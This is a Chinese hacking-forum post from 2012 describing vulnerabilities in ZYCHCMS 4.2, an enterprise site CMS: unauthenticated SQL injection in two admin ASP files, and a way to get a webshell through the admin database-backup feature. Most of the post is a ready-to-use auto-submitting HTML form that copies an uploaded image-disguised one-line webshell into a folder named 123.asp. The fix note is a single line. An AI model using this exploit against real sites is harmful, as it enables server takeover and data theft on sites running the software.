找回密码
 立即注册
查看: 2540|回复: 0
打印 上一主题 下一主题

ZYCHCMS企业网站管理系统SQL注入漏洞及后台拿webshell

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-10 21:09:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
# B6 g7 F) C9 ?8 g- t

, t. _  s, r+ U) T
& V, ?% Z& @, V5 c: b4 G
1 T+ ?" k" Q; U* V1 Q影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)1 e+ [/ B) j4 T
①SQL注射漏洞
# v1 e, T) t' Q+ q 漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
3 n$ f7 O& _& [8 P 漏洞原因:未过滤
) r% l# u3 D7 D$ X/ A 漏洞代码:* s, f6 N' n6 o7 n( R3 }
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。
$ N$ [2 P' Z& F4 L 修复方法:在文件开头加入代码) f' Z7 Y9 Z4 p( K: Y- C
8 V  @7 r2 S. u; Z+ D0 k  v

2 U. g7 B8 ^+ _1 P" \# T6 ^, d4 @②后台拿WBSHELL9 q2 N1 |* [! {
进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
' V0 \- T7 Q$ g# q: u  G 这里在网上找了一个,改了下,将就着用。
2 m" G  v5 K: A4 o! d: r 以下是代码本地提交代码
; d  ~; G" K5 K2 v% L
& X" a. e6 f9 V' x1 k
% _5 I* h6 |9 J# G/ d7 B- c<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
5 k3 T  ?2 B- I5 [ <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
3 E: i( f; H* A8 _ <tr>! X2 e9 w+ t# `% X) O9 }1 k
<td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>. T/ u4 @+ t( S, J0 ^
</tr>& q2 I8 d! {2 ^% M2 U0 n/ Q# z
<tr>7 y! B- s3 M& b5 F5 |
<td bgcolor=”#FFFFFF”><span class=”back_southidc”>& @# `* x7 J% v" P5 M8 L# W
</span>: D. h9 e% s9 W4 J# b- v9 P
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
( ?2 v! }3 }9 S: Z. X6 b <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >! h6 r: n$ H3 E
<td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>; E' H$ u) X6 _. s8 E5 u1 C; @, z
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d+ k# T  d& `) R6 r4 y& U
<div align=”left”># N0 [1 f% ^) A+ r# w7 u* n
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />
; T0 q# A" C' M <!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>
2 \( T4 R/ Z; W3 P! [ <input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />% @+ T2 K+ G5 p( }6 G6 l
</div></td>
0 x7 D- i- ~8 M& Q- _" T8 s </tr>
9 @5 j, q4 |8 t7 ` <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>2 l+ p6 Q8 Q$ Z+ C# }# [* b4 F
<td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
& F+ ~; B3 m6 I9 }9 U <td class=”td”><div align=”left”>
% d  H, M" i; X1 ]* J <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
. X! b. p  u+ `' j% M' {# J0 d [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>. \* [6 U4 I8 R9 A# t5 [
</tr>$ j. C* l# X% q! d0 M
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
. G8 Q/ `2 ?8 }4 C4 w <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>8 M# l  [# T3 G" ^# _% K8 _' M
<td class=”td”><div align=”left”>" R4 _* l! O( f1 ?; n( b2 {
<input type=”submit” value=”确定备份” class=”btn”
2 `' s5 D5 x+ I) O- ~* a </div></td>
1 v* E2 B% D" X2 O </tr>' W) f! v7 v4 b4 G5 F2 |% F. _
</table></td></tr></form>! H. v- V* l" |4 I( a: I; I6 K
</table>0 I7 g. w$ F$ o9 c0 n# U4 k
</td>; j! v" f1 t, t. A. W0 d
</tr>8 I$ F- k: Z% v  ^5 B) u5 A$ m
</table>
9 }6 y6 v/ [  ?" u* s' F <script>
" f$ k" P8 |/ w5 V2 |+ B document.all.add.submit();  Q$ |3 l$ C5 t& r4 N6 \# s5 n
</script>" w4 x7 _+ A) P3 v/ ]7 Z

$ x" R" [1 T$ E' Z
0 @8 p4 ^4 b; d: S4 j2 F; O- b/ M* A5 q1 Y- w% T
5 ~# z- ^% v% b/ g

4 Z& l) b9 B5 O: e3 k; T
  h0 J# m1 x( V* k1 I7 E* ?. p5 n8 e/ U! c- {9 t
& Y) l, O) [; _. G" u- B+ \' i$ J

) t7 V3 S; i. g
7 v; o" j, w& x- a7 H; O6 o8 ~
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表